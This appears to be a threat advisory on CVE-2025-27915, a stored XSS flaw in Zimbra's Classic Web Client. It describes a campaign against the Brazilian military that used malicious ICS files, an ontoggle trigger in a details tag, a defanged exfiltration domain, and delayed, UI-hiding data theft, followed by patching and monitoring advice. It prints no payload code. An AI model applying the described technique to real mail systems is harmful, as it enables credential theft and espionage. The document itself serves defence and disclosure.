The security threat involves a stored cross-site scripting (XSS) vulnerability identified as CVE-2025-27915 in the Classic Web Client of Zimbra Collaboration, a widely used webmail and collaboration platform. This vulnerability stems from inadequate sanitization of HTML content embedded within ICS calendar files, which are commonly used for scheduling and calendar sharing. When a user opens an email containing a malicious ICS file, the embedded JavaScript executes via an ontoggle event inside a <details> HTML tag, enabling arbitrary code execution within the victim’s session context. This allows attackers to perform unauthorized actions such as setting email filters that redirect incoming messages to attacker-controlled addresses, facilitating data exfiltration and account compromise. The exploit observed in the wild targeted the Brazilian military, with attackers spoofing the Libyan Navy’s Office of Protocol to deliver malicious ICS files. The embedded JavaScript acted as a comprehensive data stealer, siphoning credentials, emails, contacts, and shared folders to an external server (ffrk[.]net). To evade detection, the script hides certain user interface elements and only activates if more than three days have passed since its last execution. Although Zimbra released patches in January 2025 (versions 9.0.0 Patch 44, 10.0.13, and 10.1.5), exploitation was reported months later. The attack methodology aligns with tactics used by known threat actors such as APT28, Winter Vivern, and UNC1151, who have exploited similar XSS flaws in webmail platforms to steal credentials and gain unauthorized access. The vulnerability’s exploitation highlights risks in handling ICS files and the need for robust input sanitization in webmail clients.

For European organizations, this vulnerability poses significant risks, especially for government, military, and critical infrastructure entities using Zimbra Collaboration. Successful exploitation can lead to unauthorized access to sensitive emails, credential theft, and manipulation of email filters to intercept or redirect communications, potentially causing data breaches and espionage. The ability to stealthily exfiltrate data and maintain persistence through delayed payload execution increases the threat’s severity. Organizations relying on Zimbra for internal and external communications may face operational disruptions and reputational damage. Additionally, the attack vector via ICS files, a common calendar format, broadens the attack surface beyond traditional email attachments, complicating detection and prevention. The medium CVSS score (5.4) reflects moderate severity, but the targeted nature and potential for espionage elevate the impact for high-value European targets. Failure to patch promptly could expose organizations to similar targeted attacks by advanced persistent threat (APT) groups.

European organizations should immediately verify and apply the latest Zimbra patches (9.0.0 Patch 44, 10.0.13, 10.1.5 or later) to remediate this vulnerability. Implement strict email filtering policies to quarantine or block ICS files from untrusted sources. Monitor email filter rules for unauthorized changes, especially new forwarding rules that redirect emails externally. Employ Content Security Policy (CSP) headers and web application firewalls (WAFs) to detect and block malicious script execution within webmail clients. Conduct user awareness training to recognize suspicious calendar invitations or ICS files. Restrict the use of the Classic Web Client in favor of updated clients with improved security controls. Enable logging and alerting on anomalous email activity and calendar file interactions. Consider network segmentation and least privilege access to limit the impact of compromised accounts. Regularly audit and review collaboration platform configurations and user permissions to reduce attack surface.